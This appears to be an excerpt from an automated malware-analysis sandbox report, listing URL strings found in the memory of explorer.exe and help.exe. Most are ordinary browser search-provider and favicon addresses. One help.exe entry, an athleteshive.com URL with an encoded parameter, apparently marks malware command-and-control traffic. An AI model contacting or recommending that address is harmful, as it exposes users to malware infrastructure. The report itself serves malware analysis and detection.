          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2183368799.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2180887707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2182699706.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2182699706.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2180887707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2194341895.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000000.2169916528.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: help.exe, 00000007.00000002.2376290691.0000000001262000.00000004.00000001.sdmpString found in binary or memory: http://www.athleteshive.com/?fp=FjU3U6I66l5%2FkTAZwi94VlwWms9nsw7CBNafYr15RAFiHFhOD6HIZQ%2B9c%2FrvVJ
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: 7BFBA2AD.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2182699706.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2180887707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2182699706.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2180575520.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2189266307.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
